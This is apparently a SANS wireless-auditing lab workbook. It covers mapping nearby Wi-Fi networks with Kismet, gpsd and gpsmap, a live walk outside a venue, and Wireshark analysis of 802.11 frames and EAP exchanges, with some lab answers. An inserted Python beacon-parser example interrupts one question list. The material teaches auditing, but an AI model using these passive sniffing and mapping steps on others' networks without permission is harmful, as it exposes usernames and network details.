-o       range-bssid-cdot.png     Create the output map as "range-bssid-cdot.png"
-r                                Use the "range map" diagram format
-R       50                       Change the opacity of range circles to 50%
-t                                Draw the track traveled in the diagram format
-l       bssid                    Label the networks with BSSID information
-e                                Draw estimated network center dots
         gpsmaplab.gps            Kismet GPS file to process

Putting these command-line arguments together, we can execute the gpsmap command as follows. Note that the gpsmap command wraps multiple lines in the example below.

# gpsmap -D -S 2 -d 800,600 -o range-bssid-cdot.png -t -r -R 50 -l bssid -e gpsmaplab.gps
#

Open the "range-bssid-cdot.png" file with the display utility to view the changes to the map. The updated map should look similar to the following.

Figure: Estimated range map with center-dot mapping.

1.5.7. Change color selection

GPSmap supports several color selection options for discovered networks. The default option is to use random colors for the mapping of networks. We can change this setting to color networks based on WEP-bit status, or on channel number. We'll create the range map again with the following options; the new option in this step is -n.

Option   Argument (if any)        Description
-D                                Do not delete the source map at completion
-S       2                        Use the TerraServer source for maps
-d       800,600                  Generate maps at 800x600 resolution
-o       range-bssid-chan.png     Create the output map as "range-bssid-chan.png"
-r                                Use the "range map" diagram format
-R       50                       Change the opacity of range circles to 50%
-t                                Draw the track traveled in the diagram format
-l       bssid                    Label the networks with BSSID information
-n       2                        Select colors based on channel number
         gpsmaplab.gps            Kismet GPS file to process

Putting these command-line arguments together, we can execute the gpsmap command as follows. Note that the gpsmap command wraps multiple lines in the example below.
# gpsmap -D -S 2 -d 800,600 -o range-bssid-chan.png -t -r -R 50 -l bssid -n 2 gpsmaplab.gps
<omitted for brevity>
#

Open the "range-bssid-chan.png" file with the display utility to view the changes to the map. The updated map should look similar to the following.

Figure: Estimated range map with traveled track, BSSID labeling and color selection based on channel number.

Repeat this step, changing the color selection to reflect the WEP bit status ("-n 2" becomes "-n 1"). Name the output map "range-bssid-wep.png".

1.5.8. Filter for a specified network

An important feature of gpsmap is the ability to produce maps based on a specified list of MAC addresses. This allows the auditor to document the networks for a specific organization without mapping the nearby networks that are not connected to the target network. To use this feature, supply gpsmap with a comma-delimited list of BSSIDs to map. By default, gpsmap expects the list to be an exclusive list (e.g. "Don't map these BSSIDs"), so we need to reverse this logic by instructing gpsmap to use the filter list as an inclusive list. For this step, we'll introduce a new map type known as a scatter-plot map; the new options in this step are -a, -A, -f and -i.

Option   Argument (if any)       Description
-D                               Do not delete the source map at completion
-S       2                       Use the TerraServer source for maps
-d       800,600                 Generate maps at 800x600 resolution
-o       scat-filt-bssid.png     Create the output map as "scat-filt-bssid.png"
-a                               Draw a scatter-plot map
-A       50                      Change the opacity of the scatter-plot map to 50%
-f       00:40:96:47:86:CE       Filter on the selected MAC address; the MAC must use upper-case characters
-i                               Invert the filter to make the filter list inclusive
-t                               Draw the track traveled in the diagram format
-l       bssid                   Label the networks with BSSID information
         gpsmaplab.gps           Kismet GPS file to process

Putting these command-line arguments together, we can execute the gpsmap command as follows.
Note that the gpsmap command wraps multiple lines in the example below.

# gpsmap -D -S 2 -d 800,600 -o scat-filt-bssid.png -t -a -A 50 -f 00:40:96:47:86:CE -i -l bssid gpsmaplab.gps
#

Open the "scat-filt-bssid.png" file with the display utility to view the changes to the map. The updated map should look similar to the following.

Figure: Scatter plot map with traveled track, filtered to display only traffic from BSSID 00:40:96:47:86:CE.

This completes our first lab exercise. Congratulations.

Answers

Section 1.2.5
Question: How many packets are displayed after applying the WEP bit set filter?
Answer: 13

Section 1.2.6
Question: How many packets are displayed after applying the inverse WEP filter?
Answer: 1092

Section 1.2.7
Question: How many packets are displayed after removing all the beacon frames from the capture file?
Answer: 58 packets using the "wlan.fc.type_subtype != 8" display filter.

Section 1.2.8
Question: How many packets are displayed for the given BSSID?
Answer: 179 packets using the "wlan.bssid eq 00:40:96:47:86:ce" display filter.

Section 1.2.9
Question: How many packets are displayed for the given BSSID that are not beacon frames?
Answer: 24 packets using the "wlan.bssid eq 00:40:96:47:86:ce and wlan.fc.type_subtype != 8" display filter.

Section 1.2.10
Question: How many packets are displayed by excluding data and beacon frames?
Answer: 43 packets using the "wlan.fc.type_subtype != 8 and wlan.fc.type_subtype != 32" display filter.

Section 1.2.11
Question: How many packets are displayed with the string "linksys"?
Answer: 621 packets using the 'frame contains "linksys"' display filter.

Section 1.4.2
Question: What does the abbreviation "T" represent in this screen?
Answer: The abbreviation "T" is for Turbocell networks, a Lucent Outdoor Router network.

Question: What do the abbreviations "A", "P" and "H" represent in this column?
Answer: "A" represents wireless networks with an access point, "P" represents a probe request for a network from a client and "H" indicates an ad-hoc network.

Question: What keystroke is used to exit the help menu?
Answer: "x" is used to exit the help menu.

Section 1.4.4
Question: Does Kismet indicate the network uses WEP for the selected network?
Answer: This will depend on the networks that are present in your area. The status of WEP in use for a selected network is indicated in the "WEP" row.

Question: What channel is the selected network using?
Answer: This will depend on the networks that are present in your area. The channel for the selected network is indicated in the "Channel" row.

Question: Is Kismet able to identify the manufacturer for the selected network? What manufacturer does Kismet identify?
Answer: This will depend on the networks that are present in your area. In some cases, Kismet will be able to identify the network in the "Manuf" row. In cases when Kismet is unable to identify the network, the manufacturer will be identified as "Unknown".

Section 1.4.6
Question: What information are you able to obtain about the networks observed in your area from this window?
Answer: This will depend on the networks that are present in your area.

Lab 2 - Live Network Mapping

Complete the exercises in this lab to reinforce the material covered in the Sniffing Wireless module. To complete these exercises, you will need the Backtrack Security Tools Linux CD, a supported wireless card and a USB GPS, as included in the SWAT toolkit.

Lab 2-1: Live Network Mapping

Purpose: This lab will provide hands-on experience using Kismet and gpsmap to document a live network.
Description: In this lab exercise you will use Kismet and the GPS included in your SWAT kit to identify the presence of any wireless networks that exist outside the conference venue. After collecting network traffic with Kismet, you will return to the classroom environment to download satellite photography information with gpsmap to document the track you traveled and the estimated range of any wireless networks that were reported.

2.1.1. Preparing the System

Kismet requires the gpsd daemon to collect GPS coordinate information. After booting the Backtrack CD, connect the USB GPS included in your SWAT toolkit to your laptop on an available USB port. The red LED should start blinking when connected.

NOTE: Some GPS units from the same manufacturer may have a solid LED when initially powered on, which turns into a blinking LED when it receives a satellite lock. You should observe the behavior of the LED when you first plug in the GPS, noting that a change in the LED behavior indicates a satellite lock.

Start the gpsd tool from a shell prompt, as shown:

# gpsd /dev/tts/USB0
#

Now that the GPS helper software is started, insert the wireless card into an available PCMCIA slot. You may use either the Yagi directional antenna or the omni-directional antennas distributed with your SWAT kit. Next, start Kismet by clicking "K > Backtrack > Wireless Tools > Analyzer > Kismet".
Backtrack will start Kismet, storing the captured data in the root user's home directory (/root). At this point, Kismet will automatically channel hop and identify any networks that are discovered.

2.1.2. Verify Kismet and gpsd

While inside, it is unlikely you will have connectivity to satellites providing GPS data. However, if Kismet is able to communicate with the gpsd process, and the gpsd process is reading data appropriately, Kismet will display lat/lon lines of all 0's, as shown below:

Figure: Kismet display with gpsd connected but no satellite fix (lat/lon of all 0's)

Ensure that Kismet has the lat/lon line above the Status text indicating it is getting data from gpsd. Once you are outside and get a lock on three or more satellites, the GPS will report valid lat/lon information to Kismet. Kismet will update the display to report this information along with a "Fix" indicator of 3D or 2D (4 or 3 satellites, respectively), as shown below:

Figure: Kismet display with a valid GPS fix

2.1.3. Note the Time

The next step is to take your laptop and GPS and leave the conference facility to get a clear view of the sky. Please note the time before leaving the conference facility and return in 10 minutes. Walk with the laptop and GPS for no more than 10 minutes before returning to the classroom. When you return to the classroom, do not forget to reconnect your power adapter!

2.1.4.
Map the area

The next step is to take your laptop and GPS and leave the conference facility to get a clear view of the sky. It may be necessary to step away from the conference facility by 50' or more to get a clear view of the sky in three directions. After leaving the facility and stepping away from the building, watch the red LED on the GPS. When the GPS light is a solid red (stops blinking), the GPS has locked onto three or more satellites and is recording location information. It may take several minutes for the GPS to synchronize with three satellites to get an accurate location reading; please be patient. If after several minutes the GPS LED is still blinking, move farther away from nearby buildings to get a clear view of the sky. When you return to the classroom, do not forget to reconnect your power adapter!

2.1.5. Quit Kismet

After returning from the live network assessment, quit the Kismet tool by pressing "Q" (capital Q). Backtrack will automatically close the XTerm window for Kismet as well. You may also disconnect the GPS at this time if you wish.

2.1.6. Identify Kismet Files

Return to an XTerm window (or open a new XTerm, if desired). Change to the "/root" folder and list all the files that include the word "Kismet", as shown below.

# cd /root
# ls Kismet*
Kismet-Apr-20-2006-1.csv      Kismet-Apr-20-2006-1.network
Kismet-Apr-20-2006-1.dump     Kismet-Apr-20-2006-1.xml
Kismet-Apr-20-2006-1.gps
#

2.1.7. Connect to the classroom network

Next we will use the "SANS-ROGUE01" network for connectivity to contact web sites to download satellite images of our current location. The SANS-ROGUE01 network is open and does not require a WEP key for authentication. Execute the following commands from a shell prompt to connect to the SANS-ROGUE01 network:

# killall dhcpcd
# iwconfig wlan0 essid SANS-ROGUE01 enc off mode managed
# dhcpcd -d wlan0

At this point, your system should be connected to the SANS-ROGUE01 network.
If you had trouble getting to this point, please contact a proctor or the instructor for assistance.

2.1.8. Create an estimated range map

Estimated range maps are useful to characterize the estimated coverage of a network without requiring a large set of data samples. The estimated range map takes some liberties to estimate the actual useful range of the network based on lost packet characteristics and signal strength information, and can paint a very different picture than the hull map. We'll create an estimated map with the following gpsmap options:

Option   Argument (if any)   Description
-D                           Do not delete the source map at completion
-S       2                   Use the TerraServer source for maps
-d       800,600             Generate maps at 800x600 resolution
-o       venue-range.png     Create the output map as "venue-range.png"
-r                           Use the "range map" diagram format
-R       50                  Change the opacity of range circles to 50%
-t                           Draw the track traveled in the diagram format
-l       bssid               Label the networks with BSSID information
-n       1                   Select colors based on WEP status
         Kismet*.gps         Kismet GPS file collected in this lab exercise

Putting these command-line arguments together, we can execute the gpsmap command as follows. Note that the gpsmap command wraps multiple lines in the example below.

# gpsmap -D -S 2 -d 800,600 -o venue-range.png -t -r -R 50 -l bssid -n 1 Kismet*.gps
#

Gpsmap will attempt to contact the terraservice.net website to download the appropriate satellite photographs based on the latitude and longitude information collected during the assessment, producing the file "venue-range.png". Open the "venue-range.png" file with the display utility as shown below:

# display venue-range.png

Note that the color selection will identify networks that do not have the WEP bit set as red. Networks with the WEP bit set are identified with green.

2.1.9.
Create a scatter plot with track traveled

Next, we'll generate a scatter plot map to identify the locations where packets were received, documenting the track that you traveled to collect the information. We'll create a scatter plot map with the following gpsmap options:

Option   Argument (if any)   Description
-D                           Do not delete the source map at completion
-S       2                   Use the TerraServer source for maps
-d       800,600             Generate maps at 800x600 resolution
-o       venue-scat.png      Create the output map as "venue-scat.png"
-a                           Use the "scatter map" diagram format
-t                           Draw the track traveled in the diagram format
         Kismet*.gps         Kismet GPS file collected in this lab exercise

Putting these command-line arguments together, we can execute the gpsmap command as follows. Note that the gpsmap command wraps multiple lines in the example below.

# gpsmap -D -S 2 -d 800,600 -o venue-scat.png -a -t Kismet*.gps
<omitted for brevity>
#

Gpsmap will use the cached satellite photographs, producing the file "venue-scat.png". Open the "venue-scat.png" file with the display utility as shown below:

# display venue-scat.png

Note that the track traveled may not match the actual path that you walked, due to fluctuations in the accuracy of the GPS readings. When performing an actual assessment, allocate at least 10 minutes for the GPS to synchronize with satellites, placing the GPS as high as possible.

2.1.10. Quit Kismet

After returning from the live network assessment, quit the Kismet tool by pressing "Q" (capital Q). Backtrack will automatically close the XTerm window for Kismet as well. You may also disconnect the GPS at this time if you wish.

This completes our second lab exercise. Congratulations.

Lab 3 - 802.11 MAC

Complete the exercises in this lab to reinforce the material covered in the 802.11 MAC module. To complete these exercises, you will need the Wireshark sniffer and the packet captures provided on the SANS SWAT kit CD-ROM.

Lab 3-1: Assessing IEEE 802.11 Frames

3.1.1.
Examining the 802.11 frame header

In the course material associated with this lab we reviewed the frame formatting for 802.11 frames. It may be helpful to open your course material to the slides depicting the frame format as a reference while you complete this lab. This step will examine the standard header for 802.11 frames, identifying the frame control, duration/ID, destination address, source address, BSSID address, fragment number and sequence number fields.

First, open Wireshark by clicking "K > Run Command ...", enter "wireshark" in the run dialog box, then click Run. Next, open the "lab3-80211.dump" capture file by clicking File > Open from the Wireshark interface. In the "Open" dialog box, navigate to the /tmp/lab3 folder and select the "lab3-80211.dump" capture file. Wireshark will open the file, dissect the contents of frames and display them as shown below:

Figure: Wireshark window after opening the "lab3-80211.dump" packet capture.

Next, navigate to frame number 34, clicking on the frame. In the dissector view, expand the "IEEE 802.11" tree. It may be helpful to slide the top frame of the dissector view up to maximize the amount of information that can be displayed in this pane.

3.1.1.1 Examining the frame control field

The first field in the header is the frame control field. Clicking on this field will highlight the corresponding two bytes in the packet detail view in the bottom of the Wireshark window. Select frame number 293. Expand the view for the Frame Control field to identify the version, type and subtype fields.
The flags field is collapsed with another tree view that can be expanded to identify any flag bits that are set.

Question: What is the version number, the type and the subtype for this packet? What flag bits are set?

3.1.1.2 Identifying the To DS and From DS bits

Two important bits in the frame-control flags field are the To DS and From DS fields. These fields identify if the network is in infrastructure mode, ad-hoc mode or WDS mode. Remember that infrastructure networks are identified with either From DS or To DS set, but not both; WDS networks set both From DS and To DS, and ad-hoc networks clear the From DS and To DS fields.

Question: Continue to examine frame 293. What are the settings of the From DS and To DS fields? Is this packet an infrastructure, WDS or ad-hoc packet?
Question: Select frame 320. What are the settings of the From DS and To DS fields? Is this packet an infrastructure, WDS or ad-hoc packet?
Question: Select frame 289. What are the settings of the From DS and To DS fields? Is this packet an infrastructure, WDS or ad-hoc packet?

3.1.1.3 Examining the Duration/ID field

The next field in the 802.11 header is the Duration/ID field. Recall from the course material that this field has two functions; it depicts the amount of time that the medium will be in use in microseconds when a packet is transmitted, and it is used to identify the association identifier when a station associates to the network.

Duration: Viewing frame number 34, examine the duration field. This field indicates that 8987 microseconds were needed to transmit this frame. Note that this value changes depending on the amount of traffic on the network and the amount of inter-frame spacing that is required between the transmission of packets.

Question: Select frame 33, what is the duration? Note that the frame size is consistent with frame number 34.
Question: Select frame 32, what is the duration? Note that the frame size is consistent with frame number 34.
Question: Select frame 36, what is the duration? Examine the frame size. Is the ratio of duration/packet size consistent with frames 32 and 34?

ID: The ID field is used by the access point to uniquely identify an associated station, known as the association identifier (AID). The ID field is used in the authentication and association process and in station power management for delayed packet delivery while a station is in power-save/conserve mode. Note that this value has a range of 1-2007; IEEE 802.11 access points cannot accommodate more than 2007 users without breaking the IEEE specification, since the AID value must not exceed 2007.

Question: Select frame 1375. This frame is a WEP authentication frame. What value is listed in the duration field? Note the packet size.
Question: Select frame 1377. This is another frame in the WEP authentication process. What value is listed in the duration field? Note the packet size.
Question: Select frame 1385. This is a frame in the association process. What value is listed in the duration field? Note the packet size.
Question: In frame 1385, navigate to the AID value by clicking IEEE 802.11 wireless LAN management frame > Fixed parameters > Association ID. What is the association ID for this station?

3.1.1.4 Identifying the destination address

The first MAC address in the IEEE 802.11 header is the destination address. This address is placed before the other addresses to optimize handling, since the AP is most concerned with where the packet is going, not where it came from.

Question: Select frame 199. What is the destination address?
Question: Select frame 234. What is the destination address?

3.1.1.5 Identifying the BSSID

The BSSID is the second MAC address in the IEEE 802.11 header. This MAC address uniquely identifies an access point for infrastructure networks, allowing multiple APs to operate on the same channel while separating traffic to discrete networks.

Question: Select frame 1132. What is the BSSID?
Question: Select frame 1133. What is the BSSID?
Question: Select frame 1134. What is the BSSID?

3.1.1.6 Identifying address fields

In the module for this lab we examined the characteristics of address fields in 802.11 packets. Recall that the 802.11 header has 3 or 4 addresses, and the order of addresses changes depending on the From DS and To DS flag settings. Use this chart to identify the order of fields based on the settings of these bitwise flags.

To DS   From DS   Address 1     Address 2     Address 3     Address 4
0       0         Destination   Source        BSSID         Not used
1       0         BSSID         Source        Destination   Not used
0       1         Destination   BSSID         Source        Not used
1       1         Receiver      Transmitter   Destination   Source

In order to identify the MAC address in the address 1 field, we need to first know the contents of the From DS and To DS fields, using this table to identify the address function.

Question: Select frame 1124. Examine the contents of the To DS and From DS fields. What is the source address of this frame? Is the node using the source address of this frame on the wireless network or the wired network?
Question: Select frame 1126. Examine the contents of the To DS and From DS fields. What is the source address of this frame? Is the node using the source address of this frame on the wireless network or the wired network?
Question: Select frame 1134. Examine the contents of the To DS and From DS fields. What is the source address of this frame? Is the node using the source address of this frame on the wireless network or the wired network?

3.1.1.7 Identifying fragmentation control fields

The fragment number and sequence number fields make up a 16-bit field in the IEEE 802.11 header. The fragment number field indicates the fragment portion that is being transmitted as part of a larger packet. The sequence number is a sequential counter that is used to associate all the fragments of a packet to a single frame. Note that fragmentation is rarely used on IEEE 802.11 networks. With a maximum
fragment size of 2312 bytes, IEEE 802.11 packets exceed the maximum Ethernet frame size by over 800 bytes. In practice, most wireless clients will set the maximum packet size to that of an Ethernet network to avoid upstream fragmentation.

Question: Select frame 1365. What is the sequence number? Note the source address.
Question: Select frame 1368. What is the sequence number? Note the difference between the sequence number in this packet and the packet previously sent by this source.
Question: Select frame 1367. What is the sequence number? Note the source address.
Question: Select frame 1368. Note that the sequence number is the same as the previous frame. Examine the frame control header and the flags bits of this frame. Note the flags that are set. What is the likely cause for this packet to use the same sequence number? (Hint: Compare the flags that are set in this packet with the flags in the previous packet.) (Hint: Take a look at the flag following the "More Fragments" bit.)

3.1.2. Assessing Beacon Frames

A frequent question on the Wireshark mailing list is "How can I filter beacon frames out of my wireless packet capture?" (answer: "wlan.fc.type_subtype != 8"). Despite the frequent requests to exclude this information, beacon frames can be a valuable source of information for an auditor. Follow these steps to assess the beacon frames in the "lab3-80211.dump" packet capture file.

3.1.2.1 Display only beacon frames

Use the display filter functionality to exclude all packets except beacon frames. (Hint: Invert the filter listed above.) (Hint: The filter should return 219 packets.)

3.1.2.2 Examine the destination address

The destination address in beacon frames is always the broadcast address. Select the destination address in one of the beacon frames to identify the packet detail byte selection.

3.1.2.3 Fixed management frame parameters

Beacon frames include three fixed parameters with each packet sent.
This includes the timestamp, beacon interval and capability information.

Timestamp: The timestamp field is used to synchronize timing for all the stations on the network to ensure transmissions are in sync. This field is a 64-bit counter, incrementing by 1 every microsecond the AP has been active. With this large a counter field, it would take over 580,000 years for this value to wrap; hopefully we'll have settled on an improved technology for wireless networks by then.

An interesting characteristic of this field is that it can provide the auditor with the uptime information of the AP. Since the BSS timestamp starts at 0 and increments by 1 for each microsecond of uptime, we can take the value and divide it by one million to determine the number of seconds of AP uptime.

Select frame 1132. Click to expand the "IEEE 802.11 wireless LAN management frame" field, then expand the "Fixed parameters (12 bytes)" field. Note the Timestamp value is "0x0000000086a33037". Converting this value to decimal, we get 2,258,841,655. Dividing this value by 1,000,000 we can determine the uptime of the AP as 2258.841655 seconds, or 37.5 minutes.

Unfortunately, the Backtrack Security Tools distribution does not include a calculator capable of converting hexadecimal to decimal numbers. We can use the shell (in an XTerm window) to help us with this conversion using the "printf" utility. The printf utility works similar to the C function of the same name. Simply replace the hexadecimal value listed in the example below to have printf print the decimal value, as shown below.

root@1[root]# printf "%d\n" 0x0000000086a33037
2258841655
root@1[root]#

The output of the printf utility gives us the uptime of the access point in microseconds. We can convert this to an uptime in minutes by dividing this number by (1000000 * 60), where 1000000 is the number of microseconds in a second, and 60 is the number of seconds in a minute.
We can use the Backtrack calculator for this simple calculation, or use the shell as shown below.

root@1[root]# echo $((60 * 1000000))
60000000
root@1[root]# echo $((2258841655/60000000))
37
root@1[root]#

Question: Select frame 1387. What is the uptime of the AP?

Beacon interval: The standard configuration of IEEE 802.11 networks is to transmit beacons at a rate of approximately 10 times per second. This frequency is recommended to ensure accurate time synchronization on the network. This value is generally left unchanged, unless the wireless network is of the WDS type connecting two facilities over a great distance, where the round-trip transmission time between the two ends of the connection exceeds 1/10th of a second.

Capability information: The capability field is a 16-bit flags field that indicates the functionality supported by the AP. This includes whether the transmitter can accommodate WEP traffic, whether the transmitter is an AP, whether short preambles are permitted, and many more fields.

3.1.2.4 Tagged management frame parameters

Tagged management frame parameters are variable in length and order. Remember that each tagged management parameter has at least three fields: the tag number, the tag length and the tag content. Select frame 71, expanding the "Tagged parameters" field. The first tag indicates the network name or SSID, with tag number 0, as "aruba-demo". Note that the tag length is 10 to reflect the 10 bytes in the network name. In the case of networks that do not disclose the SSID, or "cloaked" networks, tag number 0 is still set in beacon frames, but the tag content is set to one or more spaces (ASCII character 0x20).

Several other tagged parameters are listed in the payload of beacon frames, including supported data rates, channel number and supported encryption types.

Question: Select frame 71. Which channel is used for this AP according to the "DS Parameter Set" tag?

Question: What basic rates are supported by the AP?
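The fixed and tagged beacon parameters described in 3.1.2.3 and 3.1.2.4, decoded in Python as an added example (not from the workbook or from Wireshark): the 12 fixed bytes, the uptime calculation, and the tag walk that recovers SSID, rates and channel, including the cloaked-SSID case. The beacon body below is constructed to carry the timestamp and SSID quoted in the text; the lab3-80211.dump capture is not used.

```python
"""Decode the fixed and tagged parameters of an IEEE 802.11 beacon frame body.

Added example, not part of the SANS workbook or of Wireshark. The frame body
is CONSTRUCTED to match values discussed in the lab (timestamp
0x0000000086a33037, SSID "aruba-demo", channel 1); it is not taken from the
lab3-80211.dump capture.
"""
import struct

# Capability Information bits we care about (IEEE 802.11 capability field).
CAPABILITY_BITS = {
    0x0001: "ESS",
    0x0002: "IBSS",
    0x0010: "Privacy (WEP/TKIP/CCMP required)",
    0x0020: "Short preamble",
    0x0400: "Short slot time",
}

def parse_fixed_parameters(body):
    """Return timestamp (us), beacon interval (TU) and capability flags.

    The 12 fixed bytes are little-endian: 8-byte timestamp, 2-byte beacon
    interval in time units of 1024 us, 2-byte capability bitfield.
    """
    timestamp, interval, capability = struct.unpack_from("<QHH", body, 0)
    flags = [name for bit, name in CAPABILITY_BITS.items() if capability & bit]
    return {"timestamp_us": timestamp, "beacon_interval_tu": interval,
            "capability": capability, "flags": flags}

def uptime_minutes(timestamp_us):
    """AP uptime implied by the TSF timestamp (the counter starts at 0 at AP boot)."""
    return timestamp_us / (1_000_000 * 60)

def parse_tagged_parameters(body, offset=12):
    """Walk the tag number / tag length / tag content triples after the fixed part."""
    tags = []
    while offset + 2 <= len(body):
        number, length = body[offset], body[offset + 1]
        content = body[offset + 2: offset + 2 + length]
        if len(content) < length:
            raise ValueError("truncated tagged parameter %d" % number)
        tags.append((number, content))
        offset += 2 + length
    return tags

def decode_ssid(content):
    """Tag 0. A cloaked network carries an empty SSID or one made only of spaces/NULs."""
    if len(content) == 0 or set(content) <= {0x20, 0x00}:
        return None
    return content.decode("utf-8", errors="replace")

def decode_rates(content):
    """Tags 1 and 50. Each byte is a rate in 500 kbps units; bit 7 marks a basic rate."""
    return [((b & 0x7F) / 2.0, bool(b & 0x80)) for b in content]

def summarize_beacon(body):
    """Combine fixed and tagged parameters into what an auditor notes per AP."""
    fixed = parse_fixed_parameters(body)
    summary = {"uptime_minutes": uptime_minutes(fixed["timestamp_us"]),
               "flags": fixed["flags"], "ssid": None, "channel": None,
               "basic_rates": [], "supported_rates": []}
    for number, content in parse_tagged_parameters(body):
        if number == 0:
            summary["ssid"] = decode_ssid(content)
        elif number in (1, 50):                      # Supported / Extended Supported Rates
            for rate, basic in decode_rates(content):
                summary["supported_rates"].append(rate)
                if basic:
                    summary["basic_rates"].append(rate)
        elif number == 3 and len(content) == 1:      # DS Parameter Set: channel
            summary["channel"] = content[0]
    return summary

# Constructed beacon body: timestamp from the lab text, 100 TU interval,
# ESS + Privacy + Short preamble capability, SSID "aruba-demo", rates, channel 1.
CONSTRUCTED_BEACON_BODY = (
    struct.pack("<QHH", 0x0000000086a33037, 100, 0x0031)
    + bytes([0, 10]) + b"aruba-demo"
    + bytes([1, 4, 0x82, 0x84, 0x8B, 0x96])          # 1, 2, 5.5, 11 Mbps, all basic
    + bytes([3, 1, 1])                               # DS Parameter Set: channel 1
    + bytes([50, 2, 0x0C, 0x18])                     # extended rates: 6, 12 Mbps
)
# Constructed cloaked beacon: tag 0 present but containing a single space.
CONSTRUCTED_CLOAKED_BODY = struct.pack("<QHH", 0, 100, 0x0001) + bytes([0, 1, 0x20])

if __name__ == "__main__":
    print(summarize_beacon(CONSTRUCTED_BEACON_BODY))
    print(summarize_beacon(CONSTRUCTED_CLOAKED_BODY))
```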
Question: Select frame 1358. What data rates are supported by this AP?

Question: Reference frame 1358. Which channel is used by this AP?

3.1.3. Assessing authentication and association

When connecting to a wireless network, a client must complete the authentication phase (using open authentication, or shared authentication in the case of WEP networks), and then associate to the network. Let's take a look at this exchange.

3.1.3.1 Exclude uninteresting traffic

Apply the following display filter to exclude all traffic except probe request, probe response, authentication and association traffic:

wlan.fc.type_subtype eq 11 or wlan.fc.type_subtype < 6

Click "Apply" to activate the display filter. The filter should return 198 packets.

3.1.3.2 Probe request

When a client wishes to connect to a network, it actively or passively scans for available networks. Most clients use the active scanning mechanism by issuing probe request frames on all channels on which they detect wireless activity, sent to the broadcast address. The probe request packet is another type of management frame that includes only tagged parameters; no fixed parameters are included in this frame.

Question: Select frame 1360. Note the frame subtype is "4". What is the destination address? What is the BSSID?

Question: Reference frame 1360. What is the management information included in tag 0? What does this information represent?

Question: Reference frame 1360. What is the management information included in tag 1? What does this information represent? How does this information characterize the client that transmitted this frame?

3.1.3.3 Probe response

Upon receiving probe request frames, APs will respond with the information needed to communicate with the AP.

Question: Select frame 1361. Note the frame subtype is "5". Note the destination address in comparison to the source address of frame 1360. What information is supplied to the wireless station with the probe response frame?
(Hint: Information in the IEEE 802.11 header)
(Hint: Information in the management payload of the frame)

3.1.3.4 Authentication

The authentication process is defined as open authentication (no keys are required to authenticate) or shared authentication (a shared key must be used to pass the challenge/response authentication exchange).

Question: Select frame 1375. Expand the management parameters to reveal the Authentication Algorithm. What type of authentication is used in this exchange? Note the authentication sequence number.

Question: Select frame 1377. Expand the fixed parameters management options. What step number does this frame represent? Expand the tagged parameters options. What is the length of the WEP challenge?

Question: Select frame 1381. What is the authentication sequence number? Note that the status code here identifies if the authentication was successful for the client system.

Question: How much time was required for the challenge/response authentication process between frame 1375 and 1381?

3.1.3.5 Association

While a single station can authenticate to many access points simultaneously, a station can only be associated to a single access point at any given time. Associating to multiple access points simultaneously would create a layer 2 bridging loop, which is not a good thing. Association is a simple process that does not involve any authentication. A client simply requests association, and if the AP has sufficient available resources to support the client's connection, it responds with a success message.

Question: Select frame 1383. What is the frame control subtype? What tagged parameters are included in this management frame?

Question: Select frame 1385. What is the frame control subtype? What field indicates if the AP can support the requested association? What value indicates a successful association request?

3.1.4.
Assessing 802.1x EAP exchanges

The 802.1x protocol provides a mechanism for network authentication on wireless and wired networks, using different EAP mechanisms to handle the exchange of authentication credentials. In this exercise, we'll use Wireshark to take a look at portions of the 802.1x exchange, identifying the EAP method in use in the supplied packet capture.

First, open the "lab3-eap.dump" capture file by clicking File > Open from the Wireshark interface. In the "Open" dialog box, navigate to the /tmp/lab3 folder and select the "lab3-eap.dump" capture file. Wireshark will open the file, dissect the contents of frames and display them as shown below:

[Screenshot: Wireshark window after opening the "lab3-eap.dump" packet capture]

This packet capture includes the four FCS bytes at the end of each frame. Wireshark doesn't immediately recognize this information, and may report "malformed frame" for some packets. To force Wireshark to recognize the last four bytes as FCS data, click "Edit > Preferences > Protocols > IEEE 802.11 > Assume packets have FCS > OK".

3.1.4.1 EAPOL Start message

The first frame in the 802.1x/EAP exchange is the EAPOL Start message, as shown above. This frame marks the beginning of the 802.1x authentication exchange, representing a minimal 802.1x packet. Expand the "802.1x Authentication" tree in the first frame. Identify the version number and the type value. Note that the length of the packet is 0, indicating there is no payload information.
Question: Refer to frame 1. What is the version number and the type value for 802.1x Authentication?

3.1.4.2 Identity Request

The second frame in this packet capture is an EAP message requesting identity information, as identified in the Protocol and Info columns in the Wireshark display.

Question: Is this packet from the AP or from the wireless station?
(Hint: Look at the To DS and From DS fields in the frame control header)
(Hint: Look at the source address)
(Hint: Compare the source address and the BSSID address)

Expand the "Extensible Authentication Protocol" tree in frame number 2.

Question: What is the value in the EAP Code field in this frame? Note the EAP Id number.

Question: Note the 45-byte identity string that is included in this identity request frame. What device is being identified with this string?

3.1.4.3 Identity Response

The identity response frame follows the identity request. The identity response usually discloses the username of the person who is authenticating, except in the case of the EAP type TTLS where this information is not disclosed (only "anonymous" is listed in this frame for TTLS networks).

Question: What is the EAP Code for frame number 3?

Question: What is the identity information associated with this response frame?

Note that the EAP ID number remains the same between the Identity Request and the Identity Response. The EAP ID is used to associate the request and the response data.

3.1.4.4 EAP Request

After exchanging identity information, the access point sends an EAP Request frame. This frame will contain EAP type-specific information and will vary depending on the selected EAP type.

Question: What is the EAP type used in frame number 4? How can you tell? Note the EAP ID number.

In this frame, the "request data" is an 8-byte challenge data stream listed in the peer-challenge field. We'll take a more in-depth look at the specifics associated with this EAP authentication type later in this course.
3.1.4.5 EAP Response

After the supplicant has processed the EAP Request data, it will transmit an EAP Response frame.

Question: How does the AP associate the EAP Response in frame number 5 with the previous EAP Request frame?

The response data in this frame is identified as the "Peer Challenge [8]", which is very misleading since not only does this data represent the supplicant response, it is not 8 bytes in length.

Question: How long is the response data in the "Peer Challenge" portion of the frame?
(Hint: Click on the field to highlight the data in the packet details view)
(Hint: One row of bytes in the packet details view represents 16 bytes)

3.1.4.6 EAP Success/Failure

After the AP receives the response data, it will transmit an EAP Success or an EAP Failure message.

Question: What is the status of authentication in frame number 6?

Question: How does the AP associate the EAP Request and the EAP Response in previous frames with the Success/Failure message in frame number 6?

3.1.4.7 Mutual Authentication

Frames 6 and 7 represent the repeated EAP Request and EAP Response process, this time authenticating the access point to the supplicant. Note that there is no matching EAP Success or Failure message here.

3.1.4.8 EAPOL-Key Distribution

The final frames in the EAP exchange deliver dynamic key material to the client systems. Note that the keys are not transmitted in plaintext; rather they are encrypted with the Microsoft Point-to-Point Encryption (MPPE) protocol and cannot be deduced by an attacker without knowledge of the user's password information.

Question: Examine frame 9. What type of data is this key used to encrypt?
(Hint: Look at the Key Type field)

Question: Examining frame 10, what type of data is this key used to encrypt?

Question: Assuming all clients have a different unicast key, why are two keys needed for encryption?
